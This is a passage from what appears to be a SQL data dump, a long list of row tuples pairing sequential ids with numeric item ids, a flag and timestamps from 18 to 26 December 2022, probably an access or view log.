09:52:03'),(66357,4612,1,'2022-12-18','2022-12-18 10:22:14'),(66358,2904,1,'2022-12-18','2022-12-18 10:44:44'),(66359,1877,1,'2022-12-18','2022-12-18 10:55:59'),(66360,3691,1,'2022-12-18','2022-12-18 11:06:15'),(66361,4517,1,'2022-12-18','2022-12-18 11:07:13'),(66362,1745,1,'2022-12-18','2022-12-18 11:15:25'),(66363,473,1,'2022-12-18','2022-12-18 11:30:02'),(66364,1745,1,'2022-12-18','2022-12-18 11:34:37'),(66365,3053,1,'2022-12-18','2022-12-18 11:40:56'),(66366,4681,1,'2022-12-18','2022-12-18 12:07:31'),(66367,4694,1,'2022-12-18','2022-12-18 12:19:04'),(66368,1877,1,'2022-12-18','2022-12-18 12:34:09'),(66369,5163,1,'2022-12-18','2022-12-18 12:51:01'),(66370,5163,1,'2022-12-18','2022-12-18 12:56:38'),(66371,1872,1,'2022-12-18','2022-12-18 13:38:38'),(66372,5163,1,'2022-12-18','2022-12-18 13:52:38'),(66373,1598,1,'2022-12-18','2022-12-18 14:20:14'),(66374,2309,1,'2022-12-18','2022-12-18 15:12:36'),(66375,1728,1,'2022-12-18','2022-12-18 15:28:44'),(66376,4960,1,'2022-12-18','2022-12-18 15:59:31'),(66377,4762,1,'2022-12-18','2022-12-18 16:13:44'),(66378,1612,1,'2022-12-18','2022-12-18 16:29:41'),(66379,68,1,'2022-12-18','2022-12-18 16:35:49'),(66380,4612,1,'2022-12-18','2022-12-18 17:02:20'),(66381,5001,1,'2022-12-18','2022-12-18 18:07:53'),(66382,3092,1,'2022-12-18','2022-12-18 18:28:46'),(66383,2813,1,'2022-12-18','2022-12-18 19:52:35'),(66384,473,1,'2022-12-18','2022-12-18 19:58:46'),(66385,5157,1,'2022-12-18','2022-12-18 20:24:33'),(66386,3079,1,'2022-12-18','2022-12-18 20:43:53'),(66387,4457,1,'2022-12-18','2022-12-18 20:59:01'),(66388,4697,1,'2022-12-18','2022-12-18 21:39:23'),(66389,4691,1,'2022-12-18','2022-12-18 22:24:23'),(66390,4960,1,'2022-12-18','2022-12-18 22:31:20'),(66391,2904,1,'2022-12-18','2022-12-18 22:31:51'),(66392,2904,1,'2022-12-18','2022-12-18 22:32:04'),(66393,4960,1,'2022-12-18','2022-12-18 22:32:46'),(66394,4960,1,'2022-12-18','2022-12-18 22:33:34'),(66395,4938,1,'2022-12-18','2022-12-18 22:41:35'),(66396,4706,1,'2022-12-18','2022-12-18 23:45:42'),(66397,1728,1,'2022-12-19','2022-12-19 00:27:48'),(66398,4391,1,'2022-12-19','2022-12-19 00:51:10'),(66399,4694,1,'2022-12-19','2022-12-19 01:03:02'),(66400,3226,1,'2022-12-19','2022-12-19 01:08:13'),(66401,3781,1,'2022-12-19','2022-12-19 04:16:42'),(66402,5157,1,'2022-12-19','2022-12-19 04:47:04'),(66403,4404,1,'2022-12-19','2022-12-19 04:47:31'),(66404,1598,1,'2022-12-19','2022-12-19 04:56:21'),(66405,5080,1,'2022-12-19','2022-12-19 05:27:41'),(66406,3498,1,'2022-12-19','2022-12-19 07:35:08'),(66407,4694,1,'2022-12-19','2022-12-19 08:43:30'),(66408,5163,1,'2022-12-19','2022-12-19 08:54:25'),(66409,1722,1,'2022-12-19','2022-12-19 10:14:17'),(66410,1596,1,'2022-12-19','2022-12-19 10:22:42'),(66411,570,1,'2022-12-19','2022-12-19 10:30:45'),(66412,4485,1,'2022-12-19','2022-12-19 10:32:35'),(66413,4966,1,'2022-12-19','2022-12-19 10:33:29'),(66414,1596,1,'2022-12-19','2022-12-19 10:33:50'),(66415,87,1,'2022-12-19','2022-12-19 10:34:51'),(66416,87,1,'2022-12-19','2022-12-19 10:36:12'),(66417,473,1,'2022-12-19','2022-12-19 10:38:51'),(66418,3691,1,'2022-12-19','2022-12-19 10:41:40'),(66419,87,1,'2022-12-19','2022-12-19 10:46:35'),(66420,1610,1,'2022-12-19','2022-12-19 10:51:32'),(66421,1582,1,'2022-12-19','2022-12-19 10:53:15'),(66422,4238,1,'2022-12-19','2022-12-19 11:17:02'),(66423,4960,1,'2022-12-19','2022-12-19 11:44:57'),(66424,4238,1,'2022-12-19','2022-12-19 11:55:06'),(66425,2165,1,'2022-12-19','2022-12-19 12:20:31'),(66426,4238,1,'2022-12-19','2022-12-19 13:03:26'),(66427,76,1,'2022-12-19','2022-12-19 13:42:53'),(66428,87,1,'2022-12-19','2022-12-19 13:43:18'),(66429,483,1,'2022-12-19','2022-12-19 13:47:35'),(66430,1774,1,'2022-12-19','2022-12-19 15:47:15'),(66431,91,1,'2022-12-19','2022-12-19 15:58:41'),(66432,87,1,'2022-12-19','2022-12-19 16:01:19'),(66433,72,1,'2022-12-19','2022-12-19 16:01:38'),(66434,2503,1,'2022-12-19','2022-12-19 16:02:57'),(66435,1608,1,'2022-12-19','2022-12-19 16:12:16'),(66436,4694,1,'2022-12-19','2022-12-19 16:53:36'),(66437,1600,1,'2022-12-19','2022-12-19 17:28:31'),(66438,4700,1,'2022-12-19','2022-12-19 18:50:29'),(66439,1602,1,'2022-12-19','2022-12-19 18:56:45'),(66440,4944,1,'2022-12-19','2022-12-19 19:22:39'),(66441,4677,1,'2022-12-19','2022-12-19 19:35:30'),(66442,1586,1,'2022-12-19','2022-12-19 19:37:21'),(66443,4703,1,'2022-12-19','2022-12-19 20:20:24'),(66444,474,1,'2022-12-19','2022-12-19 20:20:55'),(66445,2617,1,'2022-12-19','2022-12-19 20:58:24'),(66446,3438,1,'2022-12-19','2022-12-19 21:35:52'),(66447,1598,1,'2022-12-19','2022-12-19 22:13:23'),(66448,1722,1,'2022-12-19','2022-12-19 22:27:37'),(66449,5163,1,'2022-12-19','2022-12-19 23:08:27'),(66450,3004,1,'2022-12-20','2022-12-20 00:01:22'),(66451,1604,1,'2022-12-20','2022-12-20 00:36:47'),(66452,80,1,'2022-12-20','2022-12-20 01:19:38'),(66453,1602,1,'2022-12-20','2022-12-20 03:40:19'),(66454,1602,1,'2022-12-20','2022-12-20 03:57:18'),(66455,4709,1,'2022-12-20','2022-12-20 04:06:10'),(66456,3781,1,'2022-12-20','2022-12-20 04:06:44'),(66457,4712,1,'2022-12-20','2022-12-20 04:26:56'),(66458,4566,1,'2022-12-20','2022-12-20 04:47:36'),(66459,2617,1,'2022-12-20','2022-12-20 04:51:46'),(66460,74,1,'2022-12-20','2022-12-20 05:08:21'),(66461,4551,1,'2022-12-20','2022-12-20 05:29:17'),(66462,1870,1,'2022-12-20','2022-12-20 05:37:06'),(66463,4514,1,'2022-12-20','2022-12-20 05:49:53'),(66464,1544,1,'2022-12-20','2022-12-20 06:08:46'),(66465,4529,1,'2022-12-20','2022-12-20 06:10:31'),(66466,4457,1,'2022-12-20','2022-12-20 06:37:31'),(66467,474,1,'2022-12-20','2022-12-20 06:48:56'),(66468,2904,1,'2022-12-20','2022-12-20 06:55:40'),(66469,4517,1,'2022-12-20','2022-12-20 07:18:16'),(66470,4524,1,'2022-12-20','2022-12-20 07:43:04'),(66471,4454,1,'2022-12-20','2022-12-20 08:03:04'),(66472,474,1,'2022-12-20','2022-12-20 08:15:15'),(66473,4520,1,'2022-12-20','2022-12-20 08:18:07'),(66474,5101,1,'2022-12-20','2022-12-20 08:33:02'),(66475,4391,1,'2022-12-20','2022-12-20 11:04:47'),(66476,1614,1,'2022-12-20','2022-12-20 11:13:36'),(66477,1602,1,'2022-12-20','2022-12-20 12:22:15'),(66478,1780,1,'2022-12-20','2022-12-20 12:31:56'),(66479,4454,1,'2022-12-20','2022-12-20 13:25:09'),(66480,2617,1,'2022-12-20','2022-12-20 13:58:30'),(66481,4738,1,'2022-12-20','2022-12-20 13:59:47'),(66482,2457,1,'2022-12-20','2022-12-20 14:22:28'),(66483,5134,1,'2022-12-20','2022-12-20 14:58:01'),(66484,1728,1,'2022-12-20','2022-12-20 15:24:33'),(66485,5062,1,'2022-12-20','2022-12-20 15:24:53'),(66486,1602,1,'2022-12-20','2022-12-20 15:26:33'),(66487,1602,1,'2022-12-20','2022-12-20 15:26:34'),(66488,1602,1,'2022-12-20','2022-12-20 15:26:36'),(66489,4238,1,'2022-12-20','2022-12-20 15:34:34'),(66490,474,1,'2022-12-20','2022-12-20 15:48:47'),(66491,3102,1,'2022-12-20','2022-12-20 16:04:43'),(66492,4587,1,'2022-12-20','2022-12-20 17:04:38'),(66493,4391,1,'2022-12-20','2022-12-20 19:04:34'),(66494,1602,1,'2022-12-20','2022-12-20 20:34:37'),(66495,1602,1,'2022-12-20','2022-12-20 21:01:21'),(66496,1612,1,'2022-12-20','2022-12-20 22:19:57'),(66497,1612,1,'2022-12-20','2022-12-20 22:20:00'),(66498,84,1,'2022-12-20','2022-12-20 22:41:38'),(66499,4238,1,'2022-12-21','2022-12-21 00:34:36'),(66500,91,1,'2022-12-21','2022-12-21 00:50:18'),(66501,4436,1,'2022-12-21','2022-12-21 02:19:13'),(66502,4657,1,'2022-12-21','2022-12-21 02:59:50'),(66503,1604,1,'2022-12-21','2022-12-21 03:43:07'),(66504,1707,1,'2022-12-21','2022-12-21 04:10:33'),(66505,1713,1,'2022-12-21','2022-12-21 04:15:55'),(66506,3261,1,'2022-12-21','2022-12-21 04:25:30'),(66507,1730,1,'2022-12-21','2022-12-21 04:41:06'),(66508,1724,1,'2022-12-21','2022-12-21 05:04:36'),(66509,80,1,'2022-12-21','2022-12-21 05:27:11'),(66510,3261,1,'2022-12-21','2022-12-21 05:53:47'),(66511,4674,1,'2022-12-21','2022-12-21 07:36:08'),(66512,473,1,'2022-12-21','2022-12-21 07:43:09'),(66513,87,1,'2022-12-21','2022-12-21 07:44:56'),(66514,1594,1,'2022-12-21','2022-12-21 09:31:25'),(66515,1592,1,'2022-12-21','2022-12-21 10:43:49'),(66516,4960,1,'2022-12-21','2022-12-21 10:59:27'),(66517,4485,1,'2022-12-21','2022-12-21 11:26:32'),(66518,5140,1,'2022-12-21','2022-12-21 11:51:26'),(66519,4485,1,'2022-12-21','2022-12-21 12:10:41'),(66520,5163,1,'2022-12-21','2022-12-21 12:13:27'),(66521,4485,1,'2022-12-21','2022-12-21 13:04:13'),(66522,5140,1,'2022-12-21','2022-12-21 13:25:32'),(66523,1604,1,'2022-12-21','2022-12-21 14:21:07'),(66524,1604,1,'2022-12-21','2022-12-21 14:22:26'),(66525,2178,1,'2022-12-21','2022-12-21 14:38:01'),(66526,3691,1,'2022-12-21','2022-12-21 15:21:55'),(66527,3781,1,'2022-12-21','2022-12-21 15:24:18'),(66528,1594,1,'2022-12-21','2022-12-21 15:37:00'),(66529,570,1,'2022-12-21','2022-12-21 15:41:35'),(66530,4412,1,'2022-12-21','2022-12-21 16:08:47'),(66531,1586,1,'2022-12-21','2022-12-21 16:15:52'),(66532,1586,1,'2022-12-21','2022-12-21 16:17:17'),(66533,68,1,'2022-12-21','2022-12-21 16:34:27'),(66534,1586,1,'2022-12-21','2022-12-21 16:40:21'),(66535,5163,1,'2022-12-21','2022-12-21 17:02:01'),(66536,68,1,'2022-12-21','2022-12-21 17:16:42'),(66537,4930,1,'2022-12-21','2022-12-21 17:17:36'),(66538,4911,1,'2022-12-21','2022-12-21 17:17:46'),(66539,4930,1,'2022-12-21','2022-12-21 17:18:01'),(66540,68,1,'2022-12-21','2022-12-21 17:18:10'),(66541,84,1,'2022-12-21','2022-12-21 17:24:04'),(66542,1877,1,'2022-12-21','2022-12-21 17:24:27'),(66543,68,1,'2022-12-21','2022-12-21 17:25:34'),(66544,3764,1,'2022-12-21','2022-12-21 17:28:03'),(66545,5134,1,'2022-12-21','2022-12-21 17:47:38'),(66546,1602,1,'2022-12-21','2022-12-21 17:51:21'),(66547,1608,1,'2022-12-21','2022-12-21 18:29:14'),(66548,68,1,'2022-12-21','2022-12-21 18:49:27'),(66549,5128,1,'2022-12-21','2022-12-21 18:54:49'),(66550,1737,1,'2022-12-21','2022-12-21 19:17:35'),(66551,1614,1,'2022-12-21','2022-12-21 20:16:45'),(66552,4776,1,'2022-12-21','2022-12-21 21:23:32'),(66553,1582,1,'2022-12-21','2022-12-21 21:54:49'),(66554,2457,1,'2022-12-21','2022-12-21 22:40:29'),(66555,1544,1,'2022-12-21','2022-12-21 23:00:53'),(66556,4966,1,'2022-12-21','2022-12-21 23:15:20'),(66557,4966,1,'2022-12-21','2022-12-21 23:16:57'),(66558,4960,1,'2022-12-22','2022-12-22 00:17:53'),(66559,4960,1,'2022-12-22','2022-12-22 00:18:37'),(66560,5131,1,'2022-12-22','2022-12-22 00:55:03'),(66561,3781,1,'2022-12-22','2022-12-22 01:24:48'),(66562,4960,1,'2022-12-22','2022-12-22 01:26:06'),(66563,1749,1,'2022-12-22','2022-12-22 01:41:11'),(66564,1606,1,'2022-12-22','2022-12-22 02:59:27'),(66565,1606,1,'2022-12-22','2022-12-22 03:09:40'),(66566,1606,1,'2022-12-22','2022-12-22 03:13:12'),(66567,3791,1,'2022-12-22','2022-12-22 04:17:03'),(66568,1606,1,'2022-12-22','2022-12-22 05:37:09'),(66569,1582,1,'2022-12-22','2022-12-22 06:02:01'),(66570,4323,1,'2022-12-22','2022-12-22 06:24:29'),(66571,3030,1,'2022-12-22','2022-12-22 06:47:03'),(66572,1608,1,'2022-12-22','2022-12-22 07:15:48'),(66573,3781,1,'2022-12-22','2022-12-22 07:36:10'),(66574,2297,1,'2022-12-22','2022-12-22 07:51:05'),(66575,4363,1,'2022-12-22','2022-12-22 07:53:15'),(66576,4457,1,'2022-12-22','2022-12-22 08:16:57'),(66577,4930,1,'2022-12-22','2022-12-22 08:34:17'),(66578,1766,1,'2022-12-22','2022-12-22 08:55:32'),(66579,1776,1,'2022-12-22','2022-12-22 09:39:29'),(66580,1592,1,'2022-12-22','2022-12-22 09:39:35'),(66581,3180,1,'2022-12-22','2022-12-22 09:39:37'),(66582,1582,1,'2022-12-22','2022-12-22 09:48:43'),(66583,4508,1,'2022-12-22','2022-12-22 10:09:29'),(66584,4238,1,'2022-12-22','2022-12-22 10:12:20'),(66585,4357,1,'2022-12-22','2022-12-22 10:12:30'),(66586,4238,1,'2022-12-22','2022-12-22 10:15:41'),(66587,4238,1,'2022-12-22','2022-12-22 10:18:46'),(66588,4412,1,'2022-12-22','2022-12-22 10:44:05'),(66589,4510,1,'2022-12-22','2022-12-22 10:54:27'),(66590,3180,1,'2022-12-22','2022-12-22 11:12:05'),(66591,4963,1,'2022-12-22','2022-12-22 11:15:01'),(66592,80,1,'2022-12-22','2022-12-22 11:15:57'),(66593,4963,1,'2022-12-22','2022-12-22 11:16:33'),(66594,3486,1,'2022-12-22','2022-12-22 11:23:25'),(66595,1600,1,'2022-12-22','2022-12-22 11:54:19'),(66596,3707,1,'2022-12-22','2022-12-22 11:54:29'),(66597,4938,1,'2022-12-22','2022-12-22 11:57:13'),(66598,4762,1,'2022-12-22','2022-12-22 12:01:24'),(66599,4762,1,'2022-12-22','2022-12-22 12:07:16'),(66600,4762,1,'2022-12-22','2022-12-22 12:07:39'),(66601,4524,1,'2022-12-22','2022-12-22 12:54:30'),(66602,1872,1,'2022-12-22','2022-12-22 12:54:59'),(66603,68,1,'2022-12-22','2022-12-22 12:59:18'),(66604,4454,1,'2022-12-22','2022-12-22 12:59:30'),(66605,5248,1,'2022-12-22','2022-12-22 12:59:53'),(66606,72,1,'2022-12-22','2022-12-22 13:06:34'),(66607,1544,1,'2022-12-22','2022-12-22 13:06:51'),(66608,72,1,'2022-12-22','2022-12-22 13:07:14'),(66609,72,1,'2022-12-22','2022-12-22 13:07:29'),(66610,76,1,'2022-12-22','2022-12-22 13:07:50'),(66611,1582,1,'2022-12-22','2022-12-22 13:08:33'),(66612,4938,1,'2022-12-22','2022-12-22 13:09:44'),(66613,5125,1,'2022-12-22','2022-12-22 13:24:30'),(66614,335,1,'2022-12-22','2022-12-22 13:27:16'),(66615,5125,1,'2022-12-22','2022-12-22 13:39:29'),(66616,4454,1,'2022-12-22','2022-12-22 13:44:29'),(66617,5028,1,'2022-12-22','2022-12-22 14:03:46'),(66618,3781,1,'2022-12-22','2022-12-22 14:07:48'),(66619,3781,1,'2022-12-22','2022-12-22 14:08:31'),(66620,5122,1,'2022-12-22','2022-12-22 14:09:28'),(66621,4759,1,'2022-12-22','2022-12-22 14:25:37'),(66622,1703,1,'2022-12-22','2022-12-22 14:30:34'),(66623,5128,1,'2022-12-22','2022-12-22 14:39:26'),(66624,89,1,'2022-12-22','2022-12-22 14:44:16'),(66625,91,1,'2022-12-22','2022-12-22 14:45:46'),(66626,89,1,'2022-12-22','2022-12-22 14:48:06'),(66627,91,1,'2022-12-22','2022-12-22 14:48:12'),(66628,89,1,'2022-12-22','2022-12-22 14:49:13'),(66629,89,1,'2022-12-22','2022-12-22 14:51:30'),(66630,80,1,'2022-12-22','2022-12-22 14:51:49'),(66631,76,1,'2022-12-22','2022-12-22 14:54:36'),(66632,80,1,'2022-12-22','2022-12-22 14:54:50'),(66633,68,1,'2022-12-22','2022-12-22 14:55:38'),(66634,4930,1,'2022-12-22','2022-12-22 14:56:03'),(66635,4938,1,'2022-12-22','2022-12-22 14:56:42'),(66636,4930,1,'2022-12-22','2022-12-22 14:57:13'),(66637,68,1,'2022-12-22','2022-12-22 14:57:18'),(66638,5122,1,'2022-12-22','2022-12-22 15:24:49'),(66639,2297,1,'2022-12-22','2022-12-22 15:32:40'),(66640,5137,1,'2022-12-22','2022-12-22 15:33:49'),(66641,91,1,'2022-12-22','2022-12-22 15:39:30'),(66642,5131,1,'2022-12-22','2022-12-22 15:54:35'),(66643,68,1,'2022-12-22','2022-12-22 16:02:41'),(66644,4938,1,'2022-12-22','2022-12-22 16:39:46'),(66645,4412,1,'2022-12-22','2022-12-22 17:15:47'),(66646,3269,1,'2022-12-22','2022-12-22 19:35:20'),(66647,472,1,'2022-12-22','2022-12-22 19:43:26'),(66648,1602,1,'2022-12-22','2022-12-22 20:20:44'),(66649,335,1,'2022-12-22','2022-12-22 23:00:29'),(66650,1718,1,'2022-12-22','2022-12-22 23:39:17'),(66651,4387,1,'2022-12-22','2022-12-22 23:45:27'),(66652,4944,1,'2022-12-23','2022-12-23 00:46:31'),(66653,4444,1,'2022-12-23','2022-12-23 01:19:05'),(66654,4348,1,'2022-12-23','2022-12-23 03:01:36'),(66655,4938,1,'2022-12-23','2022-12-23 03:01:38'),(66656,4966,1,'2022-12-23','2022-12-23 03:10:38'),(66657,4966,1,'2022-12-23','2022-12-23 03:18:50'),(66658,3313,1,'2022-12-23','2022-12-23 03:36:05'),(66659,4387,1,'2022-12-23','2022-12-23 03:46:38'),(66660,472,1,'2022-12-23','2022-12-23 04:01:21'),(66661,4996,1,'2022-12-23','2022-12-23 04:17:14'),(66662,91,1,'2022-12-23','2022-12-23 04:18:03'),(66663,91,1,'2022-12-23','2022-12-23 04:26:58'),(66664,4878,1,'2022-12-23','2022-12-23 04:28:36'),(66665,4357,1,'2022-12-23','2022-12-23 04:33:16'),(66666,4335,1,'2022-12-23','2022-12-23 04:35:50'),(66667,4391,1,'2022-12-23','2022-12-23 04:40:28'),(66668,2658,1,'2022-12-23','2022-12-23 04:41:27'),(66669,4412,1,'2022-12-23','2022-12-23 04:43:17'),(66670,5071,1,'2022-12-23','2022-12-23 04:51:23'),(66671,3781,1,'2022-12-23','2022-12-23 05:23:36'),(66672,4960,1,'2022-12-23','2022-12-23 05:36:11'),(66673,4612,1,'2022-12-23','2022-12-23 05:49:49'),(66674,3261,1,'2022-12-23','2022-12-23 06:26:31'),(66675,4416,1,'2022-12-23','2022-12-23 08:30:34'),(66676,80,1,'2022-12-23','2022-12-23 08:58:46'),(66677,68,1,'2022-12-23','2022-12-23 09:10:02'),(66678,1745,1,'2022-12-23','2022-12-23 09:25:16'),(66679,1600,1,'2022-12-23','2022-12-23 09:56:40'),(66680,1594,1,'2022-12-23','2022-12-23 10:54:18'),(66681,3771,1,'2022-12-23','2022-12-23 11:04:37'),(66682,1610,1,'2022-12-23','2022-12-23 11:34:45'),(66683,1582,1,'2022-12-23','2022-12-23 12:19:28'),(66684,4657,1,'2022-12-23','2022-12-23 12:30:00'),(66685,1594,1,'2022-12-23','2022-12-23 14:10:02'),(66686,4485,1,'2022-12-23','2022-12-23 14:20:44'),(66687,1586,1,'2022-12-23','2022-12-23 14:38:22'),(66688,2804,1,'2022-12-23','2022-12-23 15:18:26'),(66689,1606,1,'2022-12-23','2022-12-23 15:45:02'),(66690,3072,1,'2022-12-23','2022-12-23 16:45:32'),(66691,5140,1,'2022-12-23','2022-12-23 16:46:49'),(66692,4420,1,'2022-12-23','2022-12-23 17:19:26'),(66693,1588,1,'2022-12-23','2022-12-23 18:11:46'),(66694,1600,1,'2022-12-23','2022-12-23 18:45:01'),(66695,4457,1,'2022-12-23','2022-12-23 19:02:29'),(66696,4938,1,'2022-12-23','2022-12-23 19:02:45'),(66697,3034,1,'2022-12-23','2022-12-23 19:38:54'),(66698,4874,1,'2022-12-23','2022-12-23 20:38:50'),(66699,4348,1,'2022-12-23','2022-12-23 21:24:05'),(66700,3694,1,'2022-12-23','2022-12-23 21:24:28'),(66701,2769,1,'2022-12-23','2022-12-23 22:54:59'),(66702,3742,1,'2022-12-23','2022-12-23 23:23:54'),(66703,472,1,'2022-12-23','2022-12-23 23:39:46'),(66704,3045,1,'2022-12-24','2022-12-24 00:17:26'),(66705,4420,1,'2022-12-24','2022-12-24 00:26:23'),(66706,472,1,'2022-12-24','2022-12-24 02:16:32'),(66707,1582,1,'2022-12-24','2022-12-24 03:05:23'),(66708,3313,1,'2022-12-24','2022-12-24 03:35:44'),(66709,3030,1,'2022-12-24','2022-12-24 04:01:48'),(66710,1718,1,'2022-12-24','2022-12-24 04:12:30'),(66711,3742,1,'2022-12-24','2022-12-24 04:16:29'),(66712,1606,1,'2022-12-24','2022-12-24 04:36:49'),(66713,1606,1,'2022-12-24','2022-12-24 04:53:16'),(66714,4348,1,'2022-12-24','2022-12-24 05:13:38'),(66715,5128,1,'2022-12-24','2022-12-24 05:37:55'),(66716,4963,1,'2022-12-24','2022-12-24 05:58:02'),(66717,68,1,'2022-12-24','2022-12-24 05:58:25'),(66718,5005,1,'2022-12-24','2022-12-24 06:17:58'),(66719,3313,1,'2022-12-24','2022-12-24 06:25:18'),(66720,2769,1,'2022-12-24','2022-12-24 08:46:45'),(66721,3498,1,'2022-12-24','2022-12-24 08:58:59'),(66722,3482,1,'2022-12-24','2022-12-24 08:59:00'),(66723,3430,1,'2022-12-24','2022-12-24 08:59:00'),(66724,3742,1,'2022-12-24','2022-12-24 08:59:04'),(66725,3438,1,'2022-12-24','2022-12-24 08:59:05'),(66726,2309,1,'2022-12-24','2022-12-24 09:09:04'),(66727,4768,1,'2022-12-24','2022-12-24 09:40:42'),(66728,1594,1,'2022-12-24','2022-12-24 09:49:19'),(66729,472,1,'2022-12-24','2022-12-24 10:16:34'),(66730,5128,1,'2022-12-24','2022-12-24 11:57:37'),(66731,1872,1,'2022-12-24','2022-12-24 12:55:05'),(66732,3694,1,'2022-12-24','2022-12-24 13:19:29'),(66733,2769,1,'2022-12-24','2022-12-24 13:40:32'),(66734,1582,1,'2022-12-24','2022-12-24 13:55:36'),(66735,1718,1,'2022-12-24','2022-12-24 14:04:09'),(66736,3313,1,'2022-12-24','2022-12-24 14:38:15'),(66737,80,1,'2022-12-24','2022-12-24 15:10:03'),(66738,4412,1,'2022-12-24','2022-12-24 15:55:21'),(66739,1872,1,'2022-12-24','2022-12-24 16:19:38'),(66740,4966,1,'2022-12-24','2022-12-24 16:21:35'),(66741,2911,1,'2022-12-24','2022-12-24 16:51:07'),(66742,2395,1,'2022-12-24','2022-12-24 16:59:47'),(66743,1586,1,'2022-12-24','2022-12-24 17:07:10'),(66744,472,1,'2022-12-24','2022-12-24 18:17:58'),(66745,80,1,'2022-12-24','2022-12-24 18:40:07'),(66746,5033,1,'2022-12-24','2022-12-24 19:02:34'),(66747,5140,1,'2022-12-24','2022-12-24 19:08:13'),(66748,1586,1,'2022-12-24','2022-12-24 19:25:03'),(66749,5137,1,'2022-12-24','2022-12-24 19:56:32'),(66750,3263,1,'2022-12-24','2022-12-24 20:43:23'),(66751,3030,1,'2022-12-24','2022-12-24 21:17:31'),(66752,4950,1,'2022-12-24','2022-12-24 22:19:11'),(66753,4768,1,'2022-12-25','2022-12-25 00:09:08'),(66754,1728,1,'2022-12-25','2022-12-25 00:43:56'),(66755,108,1,'2022-12-25','2022-12-25 00:55:15'),(66756,2148,1,'2022-12-25','2022-12-25 00:55:32'),(66757,4412,1,'2022-12-25','2022-12-25 01:39:08'),(66758,3271,1,'2022-12-25','2022-12-25 02:25:11'),(66759,108,1,'2022-12-25','2022-12-25 02:27:11'),(66760,472,1,'2022-12-25','2022-12-25 03:09:11'),(66761,4520,1,'2022-12-25','2022-12-25 04:39:24'),(66762,1544,1,'2022-12-25','2022-12-25 05:15:01'),(66763,4753,1,'2022-12-25','2022-12-25 05:54:15'),(66764,80,1,'2022-12-25','2022-12-25 06:09:17'),(66765,5067,1,'2022-12-25','2022-12-25 06:39:15'),(66766,4542,1,'2022-12-25','2022-12-25 06:43:14'),(66767,1582,1,'2022-12-25','2022-12-25 06:54:07'),(66768,4988,1,'2022-12-25','2022-12-25 07:24:21'),(66769,472,1,'2022-12-25','2022-12-25 07:39:07'),(66770,1596,1,'2022-12-25','2022-12-25 08:47:00'),(66771,3261,1,'2022-12-25','2022-12-25 08:50:45'),(66772,108,1,'2022-12-25','2022-12-25 09:59:19'),(66773,1718,1,'2022-12-25','2022-12-25 10:24:27'),(66774,1594,1,'2022-12-25','2022-12-25 11:27:28'),(66775,5037,1,'2022-12-25','2022-12-25 12:50:26'),(66776,4485,1,'2022-12-25','2022-12-25 13:53:19'),(66777,2904,1,'2022-12-25','2022-12-25 14:45:20'),(66778,2904,1,'2022-12-25','2022-12-25 14:45:48'),(66779,2904,1,'2022-12-25','2022-12-25 14:45:54'),(66780,4520,1,'2022-12-25','2022-12-25 14:47:23'),(66781,4976,1,'2022-12-25','2022-12-25 15:02:08'),(66782,3083,1,'2022-12-25','2022-12-25 15:39:40'),(66783,3038,1,'2022-12-25','2022-12-25 15:47:34'),(66784,3251,1,'2022-12-25','2022-12-25 16:07:07'),(66785,3038,1,'2022-12-25','2022-12-25 16:27:21'),(66786,2419,1,'2022-12-25','2022-12-25 17:22:14'),(66787,1594,1,'2022-12-25','2022-12-25 17:23:48'),(66788,80,1,'2022-12-25','2022-12-25 17:24:08'),(66789,1594,1,'2022-12-25','2022-12-25 17:24:11'),(66790,3083,1,'2022-12-25','2022-12-25 18:10:21'),(66791,2395,1,'2022-12-25','2022-12-25 18:34:14'),(66792,3253,1,'2022-12-25','2022-12-25 18:46:28'),(66793,108,1,'2022-12-25','2022-12-25 18:46:30'),(66794,1594,1,'2022-12-25','2022-12-25 19:00:17'),(66795,1600,1,'2022-12-25','2022-12-25 19:16:19'),(66796,1608,1,'2022-12-25','2022-12-25 19:27:56'),(66797,4753,1,'2022-12-25','2022-12-25 19:34:14'),(66798,5037,1,'2022-12-25','2022-12-25 19:39:50'),(66799,5037,1,'2022-12-25','2022-12-25 19:42:48'),(66800,3698,1,'2022-12-25','2022-12-25 20:14:45'),(66801,3056,1,'2022-12-25','2022-12-25 20:16:27'),(66802,3079,1,'2022-12-25','2022-12-25 22:34:16'),(66803,4963,1,'2022-12-25','2022-12-25 22:40:11'),(66804,1612,1,'2022-12-25','2022-12-25 23:05:55'),(66805,3038,1,'2022-12-26','2022-12-26 00:06:37'),(66806,102,1,'2022-12-26','2022-12-26 02:19:13'),(66807,2297,1,'2022-12-26','2022-12-26 02:24:14'),(66808,5046,1,'2022-12-26','2022-12-26 02:49:12'),(66809,3664,1,'2022-12-26','2022-12-26 02:51:15'),(66810,4976,1,'2022-12-26','2022-12-26 03:54:39'),(66811,108,1,'2022-12-26','2022-12-26 03:56:37'),(66812,2804,1,'2022-12-26','2022-12-26 04:13:53'),(66813,87,1,'2022-12-26','2022-12-26 04:14:09'),(66814,68,1,'2022-12-26','2022-12-26 04:14:56'),(66815,87,1,'2022-12-26','2022-12-26 04:15:03'),(66816,91,1,'2022-12-26','2022-12-26 04:15:26'),(66817,4457,1,'2022-12-26','2022-12-26 04:33:44'),(66818,3271,1,'2022-12-26','2022-12-26 04:42:08'),(66819,4977,1,'2022-12-26','2022-12-26 04:45:34'),(66820,1726,1,'2022-12-26','2022-12-26 05:06:29'),(66821,4753,1,'2022-12-26','2022-12-26 05:24:38'),(66822,1606,1,'2022-12-26','2022-12-26 05:49:39'),(66823,1594,1,'2022-12-26','2022-12-26 06:04:39'),(66824,473,1,'2022-12-26','2022-12-26 06:19:49'),(66825,4983,1,'2022-12-26','2022-12-26 06:30:06'),(66826,3045,1,'2022-12-26','2022-12-26 06:49:45'),(66827,1588,1,'2022-12-26','2022-12-26 07:45:10'),(66828,1588,1,'2022-12-26','2022-12-26 07:45:26'),(66829,1588,1,'2022-12-26','2022-12-26 07:46:31'),(66830,4988,1,'2022-12-26','2022-12-26 08:00:06'),(66831,4768,1,'2022-12-26','2022-12-26 09:08:16'),(66832,1722,1,'2022-12-26','2022-12-26 10:58:14'),(66833,5163,1,'2022-12-26','2022-12-26 12:41:20'),(66834,470,1,'2022-12-26','2022-12-26 13:40:44'),(66835,1586,1,'2022-12-26','2022-12-26 13:43:03'),(66836,1586,1,'2022-12-26','2022-12-26 13:43:12'),(66837,1588,1,'2022-12-26','2022-12-26 14:01:54'),(66838,3664,1,'2022-12-26','2022-12-26 14:05:02'),(66839,87,1,'2022-12-26','2022-12-26 14:37:39'),(66840,1726,1,'2022-12-26','2022-12-26 14:44:46'),(66841,1594,1,'2022-12-26','2022-12-26 14:46:22'),(66842,474,1,'2022-12-26','2022-12-26 